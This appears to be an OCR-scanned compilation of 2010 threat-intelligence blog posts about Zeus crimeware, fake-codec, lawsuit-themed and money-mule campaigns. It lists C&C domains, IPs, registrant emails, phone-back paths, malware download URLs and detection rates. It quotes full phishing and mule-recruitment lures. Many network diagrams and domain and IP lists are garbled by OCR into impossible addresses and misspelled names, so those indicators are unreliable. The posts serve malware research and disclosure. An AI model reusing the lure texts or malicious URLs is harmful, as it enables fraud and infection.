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17. http: //ddanchev.blogspot.com/2010/03/money-mule-recruiters-on-yahoos-web. htm 


18. http: //ddanchev.blogspot .com/2010/02/dissecting-ongoing-money-mule.htm 


19. http: //ddanchev. blogspot .com/2010/02/keeping-money-mule-recruiters-on-short .htm 


20. http: //ddanchev. blogspot .com/2009/12/keeping-reshipping-mule-recruiters-on.htm 


21. http://ddanchev. blogspot .com/2009/11/keeping-money-mule-recruiters-on-short.htm 


22. http://ddanchev. blogspot .com/2009/10/standardizing-money-mule-recruitment .htm 


23. http: //ddanchev. blogspot .com/2009/05/inside-money- launder ing-groups- spamming. htm 
24. 
25. 

26. 

27. 
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6.3.9 GazTransitStroy/GazTranZitStroy: From Scareware to Zeus Crimeware and 
Client-Side Exploits (2010-03-24 00:22) 


Remember 2009’s GazTransitStroy/GazTranZitStroy LLC, [1]AS29371? 


The fake Russian gas company whose motto was "/n gaz we trust"? It appears that in 
order to stay competitive within the cybercrime ecosystem, they are now diversifying their 
offerings from hosting scareware domains and redirectors, to [2]Jactive Zeus crimeware 
campaigns, next to client-side exploits serving campaigns used as the infection vector. 


* Go through previous posts detailing their activities: [3]GazTranzitStroyInfo - a Fake Rus- 
sian Gas Company Facilitating Cybercrime; [4]GazTransitStroy/GazTranZitStroy Rubbing 
Shoulders with Petersburg Internet Network LLC 
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AS64539 E> 
GLOBEINTERNET 
AS1668 C eins) 
ATON 
jf > Ase342 
RTCOMIL-AS 
AS42632 AS29371 
MNOGOBYTE-AS Qaztranzitstroyinto-AS 
AS39792 
ANDERS-AS 


AS3257 
TINE T-BACKBONE 
AS12389 
ROSTELECOM-AS 


From last’s week’s active Zeus C &Cs: 

houstonhotelreal.com - 91.212.41.88 - Email: admin@houstonhotelreal.com 
doctormiler.com - 91.212.41.14 - Email: cheburaskogro@yahoo.com 
pipiskin.hk - 91.212.41.40 - Email: admin@pipiskin.hk 

lopokerasandco.hk - 91.212.41.89 - Email: admin@lopokerasandco.hk 
aervrfhu.ru - 91.212.41.88/109.196.143.60 - Email: samm _87@email.com 
updateinfo22.com - 91.212.41.60/193.148.47.60 - Email: moonbeam@konocti.net 
tumasolt.com - 91.212.41.123 - Email: stuns@5mx.ru 

91.212.41.80 

91.212.41.79 

91.212.41.78 


To this week’s active Zeus campaigns: 

cpadm21.cn - 91.212.41.31 - Email: Dalas _Illarionov@yahooo.com 
doctormiler.com - 91.212.41.14 - Email: cheburaskogro@yahoo.com 
91.212.41.80 

91.212.41.79 

91.212.41.78 
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GazTransitStroy is still in operation, acting as route for malicious activity, in the very 
same way it was interacting with other cyber-crime friendly ASs (EUROHOST-NET/Eurohost 
LLC) during 2009. Let’s take a quick snapshot of malicious activity currently taking place at 


AS29371. 


Detection rate for the Zeus crimeware phoning back to GazTransitStroy/GazTranZitStroy: 


- [5]Trojan.Zbot - Result: 8/41 (19.52 %) 


- [6]TROJ KRAP.SMDA - Result: 5/42 (11.91 %) 
- [7]Packed.Win32.Krap.ae - Result: 10/42 (23.81 %) 


Client-side exploits [8](Spammer:Win32/Tedroo.AB; Win32:FakeAlert-J) - Result: 
(73.81 %) serving domains/admin panels parked at 91.212.41.87: 


hvcvjxcc.cn - Email: wang9619@163.com 
fyyxqftc.cn - Email: wang9619@163.com 
aymgeejd.cn - Email: wang9619@163.com 
gjjdrgqf.cn - Email: wang9619@163.com 
gdttjkug.cn - Email: wang9619@163.com 
pgcnbgkk.cn - Email: wang9619@163.com 
xvriomwk.cn - Email: wang9619@163.com 
bfhqrmtm.cn - Email: wang9619@163.com 
cfssixsn.cn - Email: wang9619@163.com 
vxoyqgcp.cn - Email: wang9619@163.com 
hjwbxhqr.cn - Email: wang9619@163.com 
frrszqot.cn - Email: wang9619@163.com 
axaldjqt.cn - Email: wang9619@163.com 
aafoocgv.cn - Email: wang9619@163.com 


31/42 
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195-83-190-30.ptrzonezcom 

wealdigtcn 
bbivObiecn 
tissksn.tn 

drghzeap.cn 
oldrgatcn 
gokaiyircn 

gwsdwxae.cn 
lenziyo.cn 


oe 
inkgoevicn 
a 19 1340 NET 


maaltsxg.cn 95.88.1903 195.988.190.023 ——2—p AS49093 


madttieken 


pocndgkk cn 
urybdintd.cn 
uzibnoti.cn 
vnvxitpr.cn 
vordquyo.cn 
swrlomwk.cn 
ykedifeicn 
yeksuk.cn 


zazhecim.cn 


It’s worth pointing out that fact that in February, a much more extensive portfolio of 
domains was parked on 195.88.190.30, with a small part of them, now responding to 
GazTransitStroy/GazTranZitStroy AS: 

arufeudv.cn - Email: wang9619@163.com 

axaldjqt.cn - Email: wang9619@163.com 

bbivbbir.cn - Email: wang9619@163.com 

cfssixsn.cn - Email: wang9619@163.com 

dcueqzke.cn - Email: wang9619@163.com 

drghzeap.cn - Email: wang9619@163.com 

fqfmyvii.cn - Email: wang9619@163.com 

gjjdrgqf.cn - Email: wang9619@163.com 

gokzlykr.cn - Email: wang9619@163.com 

gwsdwxae.cn - Email: wang9619@163.com 

icnzlxyo.cn - Email: wang9619@163.com 
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inkqoevl.cn - Email: wang9619@163.com 
izhdjcsu.cn - Email: wang9619@163.com 
Isggdniu.cn - Email: wang9619@163.com 
maaltsxg.cn - Email: wang9619@163.com 
mdftfxek.cn - Email: wang9619@163.com 
ntvftguu.cn - Email: wang9619@163.com 
pgcnbgkk.cn - Email: wang9619@163.com 
rbpwnrss.cn - Email: wang9619@163.com 
rzwdcsey.cn - Email: wang9619@163.com 
urybtnfb.cn - Email: wang9619@163.com 
uzfbhofi.cn - Email: wang9619@163.com 
vnvxitpr.cn - Email: wang9619@163.com 
vordquyo.cn - Email: wang9619@163.com 
xvriomwk.cn - Email: wang9619@163.com 
ycgezkpu.cn - Email: wang9619@163.com 
ykcdffei.cn - Email: wang9619@163.com 
yvuxksuk.cn - Email: wang9619@163.com 
zdzhecim.cn - Email: wang9619@163.com 


| 00:00 I 


Fake codecs serving domains parked at 91.212.41.88: 
real-time-tube.com - Email: admin@free-new-sex-video.com 


myusmailservice.com 


00:00 | H | tt ouillll 
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video-chronicle.com - Email: neujelivsamomdeli@safe-mail.net 
yahoo-movies-online.com - Email: admin@yahoo-movies-online.com 
houstonhotelreal.com - Email: admin@houstonhotelreal.com 
sex-tapes-celebs.com - Email: wnscandals@gmail.com 
evertrands.com - Email: moldavimo@safe-mail.net 
myusmailservices.com - Email: admin@myusmailservices.com 
xplacex.com - Email: i.jahmurphy@gmail.com 

xsebay.com - Email: admin@xsebay.com 

exsebay.com - Email: admin@exsebay.com 

video-info.info - Email: videinfo@gmail.com 

partner777.net - Email: potenciallio@safe-mail.net 
video-trailers.net - Email: fullhdvid@gmail.com 

primusdns.ru - Email: samm _87@email.com 

aervrfhu.ru - Email: samm _87@email.com 


Sample redirection takes place through the following sampled domain: 
- yahoo-movies-online.com/ iframe7.php 

- real-web-tube.com/ xplay.php?id=40018 - 59.53.91.124 

- multimediasupersite.com/ video-plugin.40018.exe - 62.212.66.93 


Serving video-plugin.40018.exe - [9]W32/FakeAlert.FT.gen!Eldorado - Result: 10/42 (23.81 %), 
which phones back to: 

yourartmuseum.com/fakbwq.php?q=RANDOM - 66.96.219.38 - Email: 
davidearhart@rocketmail.com 

rareartonline.com - 64.191.44.73 - Email: fellows@nonpartisan.com 

sportscararts.com - 209.159.146.234 - Email: cdaniels@pennsylvania.usa.com 
expressautoarts.com - 69.10.35.253 - Email: cdaniels@pennsylvania.usa.com 
zenovy.com/resolution.php - 66.96.222.198 

bokwer.com/borders.php - 64.120.144.119 


Domains hosting the fake codec plugin are parked at 62.212.66.93: 
bestinternetmedia.com - Email: shoemaker@angelic.com 
supermediaworld.com - Email: shoemaker@angelic.com 
hottrackdvd.com - Email: bailey@theplate.com 
multimediatoolguide.com - Email: severson@therange.com 
thebettermovie.com - Email: bailey@theplate.com 
movietoolonline.com - Email: severson@therange.com 
movietoolvideo.com - Email: shann@techie.com 
movielocationinfo.com - Email: maldonado@toke.com 
bestmultimediademo.com - Email: mcchristian@ymail.com 
dvddatacenter.com - Email: maldonado@toke.com 
videotooldirect.com - Email: shann@techie.com 


In gaz they trust, cybercriminals | don’t trust. 


This post has been reproduced from [10]Dancho Danchev’s blog. Follow him [11]on Twitter. 


1. https://zeustracker.abuse.ch/monitor .php?as=29371 

2. https://zeustracker.abuse.ch/monitor. php?as=29371 

3. http: //ddanchev. blogspot .com/2009/05/gaztranzitstroyinfo-fake-russian-gas. html 
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4. http://ddanchev. blogspot .com/2009/06/gaztransitstroygaztranzitstroy-rubbing. html 

5. https: //www.virustotal.com/analisis/d1101df370df904ff6e28b96eb1531£1d7083e6e220073d9c9eda479e563fa77—- 12693 
75808 

6. https://www.virustotal.com/analisis/45c7dcb23000feaff0e47debc4ba55d7942fd62604200c3e137ec83b3b05b616- 12693 
75843 

7. https://www.virustotal.com/analisis/1112b6b6b2ee3a4ee993ebe7£51f bcdf882b202aa47 388697b0 1de60bc1fff46- 12693 
75852 

8. http://www.virustotal.com/analisis/a34a96a9b198c9bb4c2f5087cfc66970ac70217c4d52f 0c8445e92930f 6£415b- 12693 
78273 

9. bttp://www.virustotal.com/analisis/734f3168bc22d945553f £46f8£ 2f 45f9b958d60ef 26a5e027ba955ed8b7 7a42d- 12693 
81200 

10. http://ddanchev.blogspot.com/ 

11. http://twitter.com/danchodanchev 


6.3.10 Zeus Crimeware/Client-Side Exploits Serving Campaign in the Wild 
(2010-03-24 20:29) 


[1] 


* ADO TO FAVORITES 


Photo Archive @2070735 was adkied by Anorymous on Mon Feb O lst, 2010 05:27 pm 


Archive #20 
* . 


Download Archive 


© F007 2007, Photos Archives Hosting Group, Inc. @- ALL RIGHTS RLSERVED. 


UPDATED: Friday, March 26, 2010: In a typical multi-tasking fashion like the one we’ve seen 
in previous campaigns, more typosquatted domains are being introduced, this time using the 
[2]well known IRS Fraud Application theme. What’s worth pointing out is that, just like the 
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"[3]Scareware, Sinowal, Client-Side Exploits Serving Spam Campaign in the Wild" campaign 
from last week, the current one is also launched on Friday. 


The reason? A pointless attempt by the gang to increase the lifecycle of the campaign. 


nm 
va Internal Revenue Service 


Taxpayer IO; 
Tax Type: INCOME TAX 
issue: Unreported/Underreportec income (Fraud Application) 


work n the 


Fimerg afd Paying your feOeral tunes COMeCDY and On Bene Is an INDErtaNt par Cf living and 
United States 
Please fevew (Gownlond afd execute) your tax statement 


lax-stalement taxparer i) ene 
Mf the statement is correct, contact cur Taxpayer Advocate Service, 


BS Pract Poticy 


- Sample URL: irs.gov.faodqt.com.pl /fraud.applications/application/statement.php 
- Client-side exploits serving iFrame URL: klgs.trfafsegh.com /index.php 


- Sample detection rate: tax-statement.exe - [4]Trojan-Spy.Win32.Zbot - Result: 29/42 (69.05 
%), phones back to [5]shopinfmaster .com/cnf/shopinf.jpg 
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__ el 166.820.0916 —————“2____» 433505 
166.82.78.248 


ee Des 4510820 


—— 188.240.0114 ———_—_*#______m» ss708 


186.87.215.110 


188.27.191 46 
174,96.0.014 


174.98.48.10 SS er - AS11426 


= 65.191.0.0/16 


¢16:158 icpnet pl 


65.191.217.148 


62.21.16.15¢ ——MEL gy 62210017 ——_—_4£_—_—-»® 5139110 
24.13.9968 ———MEl em 24120014 ———__*h___m 532191 
ust p 7422264019 ——$__“L__-p» asiesas 


74,222.75,106 


87-121-27-115.telecablenetcom 
PTR 
987.122.2715 ge 97121.27.024 —— gm 529030 
$8.1602025 ———M&l_»» 38.160.0.011 —————*2—___ 12322 
B9.278,23. 7 Eg 959.178.235.028 me 58102 
8943.30.33 ———MiL_» 99.43.24.0/21 ————_—_—_“2_—___ su560 
94.7351.36 ——MEL em 94730018 ——_—__—*h———@ 4512081 


98.233.79.89 ———MEL_ gy 99 233.0.016 ————___48_-_» 533657 


98.2401466 ———SEL ig 98240128017 ——————*h gm 4513367 


nsLhr-ske.com ——A—__—-pe 74.117.63.218 ———_—__——ML_——_ege 7411756021 ———Ab-g> 4560676 


Msi sitverbrend.net i _igg, 97 117 2459 


ns2hr-ske.com 87.127.192018 ——_“E-ge 4529131 


ns2_sitverbrend net a AS? 


enna 


65.195.199.21 


NET 
com.pl PP 65.128.0.011 ———— gm 5209 


Spamvertised and currently active fast-fluxed domains include: 


fercca.com.pl 
fercci.com.pl 
ferkci.com.pl 
fercki.com.pl 
foodat.com.pl 
foocit.com.pl 
forcit.com.pl 
footit.com.pl 
ferckt.com.pl 
forckt.com.pl 
foodot.com.pl 
footot.com.pl 
faodqt.com.pl 


unassigned psychznet 
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foodyt.com.pl 


redee3e.com 
redee3e.com.pl 
redee3e.pl 
redee30.com.pl 
114,46.60,166 ——————_“©2._______» 114.46.0.016 ———“%——m as3462 
118.232.144.178 ——_—_—__H gs 19 2321280119 ——At—_—-> asgo24 
A 
174.968.984.249 ——_—_————— HEL gs 174.96.0.014 ——Ab—-_—-> asi1426 
A 
201.95.176.157 —————_—_#&L_____y 201.95.0.016 ———“£—__» s27699 
24.13.99.68 ———_————5 ____g» 24120014 ——“2——@ 4532491 
4 246.231.559.192 — EL 24 231.32.019 —— ge 515146 
65.5.14.227, ——____W#EL___» 655.120/22 ———“___m» asé6389 
! y 66,249,154.65 ————___—“._ 66.249.152,0/22 ——“2—_—_» 4533576 
Hy) 71.64.18.139 —_—_—_— Ed 71.64.0016 ——— Ae 4510796 
* 
: ; 246.7753 ———$_ _—_ HEL 24 60.016 
a 99,234,211.242 ————_—_—"€__» 99 224.0.016 
A 85.157.173.166 ——_———— Eds 95,157.0,016 ——— Ae — pe 4515527 
‘ 99.69.59.195 ———__MEL_ dy o9 640.011 
i AS7132 
A _ 
75,26.179.186 ————_—___“#&U___» 7sooon 
Ld 
bS 95.64.133,205 ——_—_—_——— gs §95.64.128.017 ——Ab—> 4549170 
com.pl 
us 
nsl.skestaft corn 9 —_—_—_————— A 87.117.245.9 ——HEL_ ge 297.117.192.018 ——AS- 529131 
ns1.globalistory.net A 
NS 
P ns2.skestafcom ———— 195.19.80.9 AS? 
A 
NS2.globalistory.net 
eddpiii.com.pl 
eddsiii.com.pl 
eddsiip.com.pl 
eddsiui.com.pl 
eddsiuo.com.pl 
eddsiuy.com.pl 
edduiip.com.pl 
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edduiiz.com.pl 
edduyiz.com.pl 
edouyiz.com.pl 
ekouyiz.com.pl 


Name server of notice: 
ns1.globalistory.net - 87.117.245.9 - Email: tompsongand@aol.com 


One of [6]TROYAK-AS’s most aggressive customers (used to host their Zeus C &Cs there) 
for Q1, 2010, is once again (latest campaign is from March 12th 2010 - [7]Scareware, Sinowal, 
Client-Side Exploits Serving Spam Campaign in the Wild) attempting to build a crimeware bot- 
net, by spamvertising the [8]well known PhotoArchive theme, in between serving client-side 
exploits using an embedded iFrame on the domains in question. 


[9] 


re*"gpacer, gift” class*"“logo 1” height*"102" width*"457" 


las 

"><li><img src*"marker.gif" border**0" height#"8" widche"11"><a 

r "javascript: *t20void (addBooksark(}*%20] | t20alert (* Yourt20browsert 20ist20nott20supporteds 20byt20automat ict 20addit iont200fs 20bookmarks 
top">abD TO FAVORITES</a 


nter 
hi>Photo Archive #2070735 hi 
Pe lase*"desc">vas added by Anonymous on Bon Feb Olst, 2010 05:27 pe. , 


p>énbsp: p><p>énbsp: P p> énbsp: p 
\ serift™><strong>Archive <font lor="#999999">82070735</ font strong 


In terms of quality assurance, the campaign is continuing to use it’s proven campaign structure. 
The actual pages are hosting a binary for manual download, in between the iFrame which 
would inevitably drop the Zeus crimeware. 


Just like in previous campaigns, the gang continues to exclusively [10]registering its do- 
mains using the ALANTRON BLTD. domain registrar. Let’s dissect the ongoing campaign’s 
structure, and expose the domains, and ASs participating in it. 


Sample URL/subdomain structure: 
archive.pasweq.co.kr /id1007zx/get.php?email=email@mail.com 


photostock.pasweq.co.kr 
archives.pasweq.co.kr 
letitbit.pasweq.co.kr 
photobank.pasweq.co.kr 
photosbank.pasweq.co.kr 
photostock.pasweq.co.kr 
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Sample message: "Photos Archives Hosting has a zero-tolerance policy against ILLEGAL 
content. All archives and links are provided by 3rd parties. We have no control over the 
content of these pages. We take no responsibility for the content on any website which we 
link to, please use your own discretion while surfing the links. © 2007-2009, Photos Archives 
Hosting Group, Inc.- ALL RIGHTS RESERVED." 


[11] 


Phoenix Exploit's Kit 


Sample iFrames embedded on the pages include: cogs.trfafsegh.com /index.php 
59.53.91.192 - Email: maple@qx8.ru; klgs.trfafsegh.com /index.php 


Sample iFrame campaign structure: 
- cogs.trfafsegh.com /index.php 

- cogs.trfafsegh.com /I.php 

- cogs.trfafsegh.com /statistics.php 


- klgs.trfafsegh.com /index.php 
- klgs.trfafsegh.com /I.php 
- klgs.trfafsegh.com /statistics.php 


[12] 
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124.104.169.37 NET 
124.104.160.0/19 


A 112.200.215.98 iis AS 
112.200.192.0/19 
weld 


A 112.202.42.39 5 AS9299 


_ NET 112.202.32.0/19 A 
112.202.43.175 


112.202.63.27 
122.53.160.0/19 


122,53.161.148 
188.163.29.95 ——NEL___g 199.163.0017 ————4“S-m as12421 


117.241.177.103 ——NEL___-ge 117.241.176.0/20 


Him as9ez9 


59.92.124.144 ——MEE__g 5992112020 ———_>-” 
A 41.201.208.75 ——NEL ye 41.201.208.0/20 ————“S-> = As33774 
“ 41.249.47.244 ——NEL____-_g» 41.249.32.0'20 ————4S—» 6713 
76.77.11.189 ——NEL__ gy 0 7677.0.0/20 —————_4S-> asze8e8 


77.111.69.213 ——NEL gy 77.111.64.0/21 ————4S-> =S15467 
R 


pe 89.254.129.58 4d6f45d5.adsl_enternethu 


95.65.92.173 89,254.128.0/18 ————4S_-ge as41563 
pasweq.co.kr 95.65.92.0/22 ———_-__#S_ge 4548506 


Parked on the same IP where the iFrame domain is are also the following Zeus C &Cs - 
dogfoog.net - Email: drier@qx8.ru; countrtds.ru - Email: thru@freenetbox.ru - [13]AS4134 
(CHINANET-BACKBONE No.31,Jin-rong Street) 


Detection rates: zeus.js - [14]Trojan.JS.Agent.bik - 1/41 (2.44 %) serving update.exe - 
[15]PWS:Win32/Zbot.gen!R - Result: 17/42 (40.48 %), PhotoArchive.exe - [16]Trojan.Zbot - 
Result: 18/41 (43.91 %). The client-side exploitation is relying on the Phoenix Exploit’s Kit. 


Samples phone back to: shopinfmaster.com /cnf/shopinf.jog - 78.2.153.153; 75.172.92.77; 
78.84.78.179; 

86.106.228.77; 

184.56.245.136; 


68.49.19.6 - Email: Duran@example.com shopinfmaster.com /shopinf/gate.php 
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Relying on the ns1.starwarfan.net name server, which is also connected to other Zeus crime- 
ware C &Cs which also respond the same IPs - smotri123.com - Email: smot-smot@yandex.ru 
domainsupp.net - Email: ErnestJBooth@example.com [17] 


112.200.215.98 ——NEL_ge 112.200.192.0/19 

S$ 
112.202.4239 ——NEL_-ge 112.202.32.019 ——4AS—ge as9299 
124.125.93.210 ——WEL ge 124.125.93.0/24 ——AS-ge asi7803 
188.163.29.95 ——YEL_ 198.163.0.0117 ——“S-m asi2421 


41.201.208.75 ——NEL-ge 41.201.208.0/20 ——42-pe as33774 


41,249.49.202 ——NEL—-ge 941.249.489.020 ——4S-—> 456713 


§9.161.117.214 ——MEL > 59.161.64.0118 ——“2-m as10199 
i NET 
‘ 59.92.124.144 ——NEL_g 59.92.112.0/20 — a 
i 59.92.243.114 ——“EL_g 59.92 240.0/20 
A 76.77.11.189 ———NEL__ 76.77.0020 ———4S-m» as26888 
\ 77.29.115.28 ——NEL__ye 77.29.0.0116 ———“S-m» as6e21 


89.218.135.53 ——NEL yy 990.218.128.020 ——“S-—gm> asgigs 
91.185.115.154 ——NEL_ge 917.195.112.020 ——4S-pe AS41937 
v 94.180.70.29 ——NEL_g 94.180.68.0/22 ——“S-g> asi2768 
95.65.92.173 ——NEL_-ge 95.65.92.022 ———“S-» asas5so6 


pasweolkz.com 


Active and fast-fluxed subdomains+domains participating in the campaign: 
pasweokz.com - Email: romavesela@yahoo.com 
pasweq.co.kr - Email: romavesela@yahoo.com 


archive.pasweokz.com 


archive.pasweq.co.kr 


3226 


archives.pasweokz.com 
archives.pasweq.co.kr 
letitbit.pasweokz.com 
letitbit.pasweq.co.kr 
photobank.pasweokz.com 
photobank.pasweq.co.kr 


photosbank.pasweokz.com 
photosbank.pasweq.co.kr 
photoshock.pasweokz.com 
photoshock.pasweq.co.kr 
photostock.pasweokz.com 
photostock.pasweq.co.kr 


Name servers currently in use were also seen in February, 2010 ([18]IRS/PhotoArchive 
Themed Zeus/Client-Side Exploits Serving Campaign in the Wild) 


nsl.addressway.net - 87.117.192.79 - Email: poolbill@hotmail.com 


ns1.skc-realty.com - 87.117.192.79 - Email: skc@realty.net 


Updates will be posted as soon as new developments emerge. Consider going through 
the related posts, to catch up with the gang’s activities for Q1, 2010. 


Related posts: 

[19]Scareware, Sinowal, Client-Side Exploits Serving Soam Campaign in the Wild 
[20]TROYAK-AS: the cybercrime-friendly ISP that just won’t go away 
[21]AS50215 Troyak-as Taken Offline, Zeus C &Cs Drop from 249 to 181 
[22]Outlook Web Access Themed Spam Campaign Serves Zeus Crimeware 
[23]Pushdo Serving Crimeware, Client-Side Exploits and Russian Bride Scams 
[24]PhotoArchive Crimeware/Client-Side Exploits Serving Campaign in the Wild 
[25]Tax Report Themed Zeus/Client-Side Exploits Serving Campaign in the Wild 
[26]Keeping Money Mule Recruiters on a Short Leash - Part Two 


This post has been reproduced from [27]Dancho Danchev’s blog. Follow him [28]on Twitter. 


1 
2. 

3. http: //ddanchev. blogspot .com/2010/03/scareware-sinowal-client-side-exploits.htm 

4. 
5. 

6 


3227 


7. http: //ddanchev. blogspot .com/2010/03/scareware-sinowal-client-side-exploits.htm 


8. http: //ddanchev. blogspot .com/2010/02/photoarchive-crimewareclient-side.htm 


9. http://1.bp.blogspot .com/_wICHhTiQmrA/S6pOvclf£3I/AAAAAAAAE1M/P- i4-UKvaa0/s1600/zeus_crimeware_photoarchi 


e_march_2010_4.JP 
10. http: //ddanchev.blogspot .com/2010/03/keeping-money-mule-recruiters-on-short .htm 


ttp://3.bp.blogspot .com/_wICHhTiQmrA/S6pP4iPAr-1I/AAAAAAAAE1U/nrQI0uLQJkg/s1600/zeus_crimeware_photoarchi 


12: 
13, 
14. 


41246 


v7. 
18. 
19. http: //ddanchev.blogspot .com/2010/03/scareware-sinowal-client-side-exploits.htm 
20. 

21. 
22. 
23. http: //ddanchev. blogspot .com/2010/01/pushdo-serving-crimeware-client-side.htm 

24 

25 

26 
27. 

28. 


6.3.11 Copyright Lawsuit Filed Against You Themed Malware Campaign 
(2010-03-29 17:42) 


x] 
complaint_docs.pdf 
(double click to view) 


Having just received a copy of what appears to be the last active domain involved in last 
week’s "[1]Copyright Lawsuit filed against you" themed [2]malware campaign, it’s time to 
conduct a brief assessment of its inner workings. 


Subject used: Copyright Lawsuit filed against you 
Sample message: March 24, 2010 

Crosby & Higgins 

350 Broadway, Suite 300 

New York, NY 10013 


To Whom It May Concern: 
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On the link bellow is a copy of the lawsuit that we filed against you in court on March 11, 2010. 
Currently the Pretrail Conference is scheduled for April 11th, 2010 at 10:30 A.M. in courtroom 
#36. The case number is 3485934. The reason the lawsuit was filed was due to a completely 
inadequate response from your company for copyright infrigement that our client Touchstone 
Advisories Inc is a victim of Copyright infrigement 

www.touchstoneadvisorsonline.com /lawsuit/suit documents.doc 


Touchstone Advisories Inc has proof of multiple Copyright Law violations that they wish 
to present in court on April 11th, 2010. 


Sincerely, 
Mark R. Crosby 
Crosby & Higgins LLP 


Detection rates: 
- complaint.doc - [3]Downloader.Lapurd - Result: 22/39 (56.42 %) 
- complaint docs.pdf - [4]Trojan-Clicker.Win32.Cycler.odn - Result: 27/42 (64.29 %) 


Samples phone back to: 
- 121.14.149.132 /fwq/indux.php?U=RANDOM DATA - AS4134, CHINA-TELECOM China Telecom 
- 121.14.149.132 /hia12/ter.php?u=UserName &c=COMPUTERNAME &v=RANDOM DATA 


login 


Login: Password: | Login | 


Active C &C administration panel at: 121.14.149,.132 /hia12/sca.php - returns "SSL ONLY.. USE 
HTTPS" 


Spamvertised domains involved in the campaign: 

- touchstoneadvisorsonline.com /lawsuit/suit _documents.doc - 72.167.232.84 

- marcuslawcenter.com /s/r439875.doc - 173.201.145.1 - Email: info@tedvernon.com 

- danilison.com/suit /complaint.doc - 72.167.183.15 

- daughtersofcolumbus.com /suit/complaint.doc - ACTIVE - 173.201.97.1 - Email: 
charlenej@stny.rr.com 


The same phone back IP was also profiled in [5]Janother campaign from January, 2010. 


Clearly, the cybercriminals behind it are aiming to stay beneath the radar, by relying on 
not so well profiled malicious infrastructure, combined with newly introduced campaigns in an 
attempt to make it harder to establish historical connections (Read about the [6]"aggregate- 
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and-forget" concept in respect to botnets/malware) between the rest of the their malicious 
activities. 


This post has been reproduced from [7]Dancho Danchev’s blog. Follow him [8]on Twit- 
te 
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ttp://www.cyberwart .com/blog/2010/01/09/undetected-malware-case-study- jan2010-01/ 


ttp://ddanchev. blogspot .com/2009/11/pricing-scheme-for-ddos-extortion. htm 
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6.3.12 Money Mule Recruitment Campaign Serving Client-Side Exploits 
(2010-03-30 18:51) 
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Remember [1]Cefin Consulting & Finance, the bogus, money mule recruitment company that 
ironically tried to recruit me last month? 


They are back, with a currently ongoing money mule recruitment campaign, this time 
not just attempting to recruit gullible users, but also, serving client-side exploits ([2]CVE- 
2009-1492; [3]CVE-2007-5659) through an embedded javascript on each and every page 
within the recruitment site. 


Let’s dissect the campaign, expose the client-side exploits serving domains, the Zeus- 
crimeware serving domains parked within the same netblock as the mule recruitment site 
itself, to ultimately expose a bogus company for furniture hosting a pretty descriptive cv.exe 
that is dropped on the infected host. 


Initial recruitment email sent from financialcefin@aol.com: 

Hello, Our Company is ready to offer full and part time job in your region. It is possible to 
apply for a well-paid part time job from your state. More information regarding working and 
cooperation opportunities will be sent upon request. Please send all further correspondence 
ONLY to Company’s email address: james.mynes.cf@gmail.com Best regards 


Response received: 
Greetings, 


Cefin Consulting & Finanace company thanks you for being interested in our offer. All addi- 
tional information about our company you may read at our Official site. www.ceffincfin.com 
Below the details of vacancy operational scheme: 


1. The payment notice and the details of the beneficiary for further payment transfer will be 
e-mailed to your box. All necessary instructions regarding the payment will be enclosed. 
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2. As a next step, you'll have to withdraw cash from our account. 

3. Afterwards you shall find the nearest Western Union office and make a transfer. Important: 
Only your first and last names shall be mentioned in the Western Union Form! No middle 
name (patronymic) is written! Please check carefully the spelling of the name, as it has to 
correspond to the spelling in the Notice. 

4. Go back home soonest possible and advise our operator on the payment details (Sender’s 
Name, City, Country, MTCN (Money Transfer Control Number), Transfer Amount). 

5. Our operator will receive the money and send it to the customer. 

6. Please be ready to accept and to make similar transfers 2-5 times a week or even more 
often. Therefore you have to be on alert to make a Western Union payment any time. 


CERIN CONSLATING & FINANCE 


AS AN AUTHORIZED FARINER 
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Should you face any problems incurred in the working process, don’t hesitate to contact our 
operator immediately. If you have any questions, please do not hesitate to contact us by 
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e-mail. If you have understood the meaning of work and ready to begin working with us, 
please send us your INFO in the following format: 


1) First name 2) Last name 3) Country 4) City 5) Zip code 6) Home Phone number, Work 
Phone number, Mobile Phone number 7) Bank account info: a) Bank name b) Account name 
c) Account number d) Sort code 8) Scan you passport or driver license 


2010 © Cefin Consulting & Finance 
All right reserved. 


Money mule recruitment URL: ceffincfin.com - 93.186.127.252 - Email: win- 
ter343@hotmail.com - [4]currently flagged as malicious. 


Once obfuscated, the javascript attempts to load the client-side exploits serving URL click- 
clicker.com /click/in.cgi?3 - 195.78.109.3; 195.78.108.221 - Email: aniwaylin@yahoo.com, or 
click-clicker.com - 195.78.109.3 - Email: aniwaylin@yahoo.com. 


Sample campaign structure: 
- click-clicke.com /cgi-bin/plt/n006106203302r0009R81fc905cX409b - 
2ddfY0a607663Z0100f055 


* click-reklama.com 


click-clicke.com 
91.213.174.0/24 —_p» AS29106 


click-reklama.com 


hostmasterclick-reklama.com 


Parked on the same IP (91.213.174.52) are also the following client-side exploit serving 
domains: 

click-reklama.com - Email: tahli@yahoo.com 

googleinru.in - Email: mirikas@gmail.com 


Within AS29106, VolgaHost-as PE Bondarenko Dmitriy Vladimirovich, we also have the 
following client-side exploits/crimeware friendly domains: 

benlsdenc.com - Email: blablaman25@gmail.com 

nermdusa.com - Email: polakurt69@gmail.com 

mennlyndy.com - Email: albertxx|@gmail.com 

kemilsy.com - Email: VsadlusGruziuk@gmail.com 

benuoska.com - Email: godlikesme44@gmail.com 
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Name server of notice nsl.ginserdy.com - 93.186.127.205 - Email: albertxxlI@gmail.com and 
nsl.ndnsgw.net - 195.78.109.3 - Email: aniwaylin@yahoo.com. have been also registered 
using the same emails as the original client-side exploit serving domains. 


Sample detection rates, and phone back locations: 

- cefin.js - [5]Troj/IFrame-DY - Result: 1/42 (2.39 %) 

- clicker.pdf - [6] 

Exploit.PDF-JS.Gen; Exploit:Win32/Pdfjsc.EM 

- Result: 21/42 (50.00 %) 

- Clicker2.exe - [7]TR/Sasfis.akdv.1; Trojan.Sasfis.akdv.1; Trojan.Win32.Sasfis.akdv - Result: 


18/42 (42.86 %) 
- cv.exe - [8] Trojan.Siggen1.15304 - Result: 3/42 (7.15 %) 
- L.exe - [9]Suspicious:W32/Malware!Gemini - Result: 4/42 (9.53 %) 
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Upon execution, the sample phones’ back to Oficla/Sasfis C &C at _ socks- 
bot.com /isb/gate.php?magic=121412150001 &ox=2-5-1-2600 &tm=3 &id=24905431 
&cache=4154905385 & - 195.78.109.3 - Email: aniwaylin@yahoo.com which drops pozi- 
tiv.md/master/cv.exe - 217.26.147.24 - Email: v.pozitiv@mail.ru from the web site of a fake 
company for furniture (PoZITIVe SRL). 


Interestingly, today the update location has been changed to tds-style.spb.ru /error/1.exe. 
Detection rate: 
- L.exe - [10]Suspicious:W32/Malware!Gemini - Result: 4/42 (9.53 %) 


